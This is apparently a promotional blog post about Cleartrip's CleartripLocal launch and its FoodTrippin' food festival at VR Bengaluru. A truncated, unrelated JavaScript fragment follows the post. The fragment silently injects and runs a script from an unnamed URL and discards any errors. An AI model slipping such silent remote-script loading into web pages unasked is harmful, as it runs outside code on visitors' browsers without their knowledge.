Cleartrip Local With Rocky And Mayur
Now Live the Local Life with Cleartrip Local
#Cleartrip launches #CleartripLocal in Bangalore at #VRBengaluru to explore the local places during free weekends.
I was recently invited by Cleartrip, India’s leading online travel and activities platform, to the launch of #FoodTrippin’ {a part of its CleartripLocal vertical} ~ a #foodfest featuring gastronomes #RockyAndMayur!
More than twenty restaurants from across Bangalore dished out scrumptious cuisine at the event organised at VR Bengaluru. Live match screening and a performance by the city’s favourite band Best Kept Secret made Food Trippin’ a perfect confluence of food, music, and entertainment.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();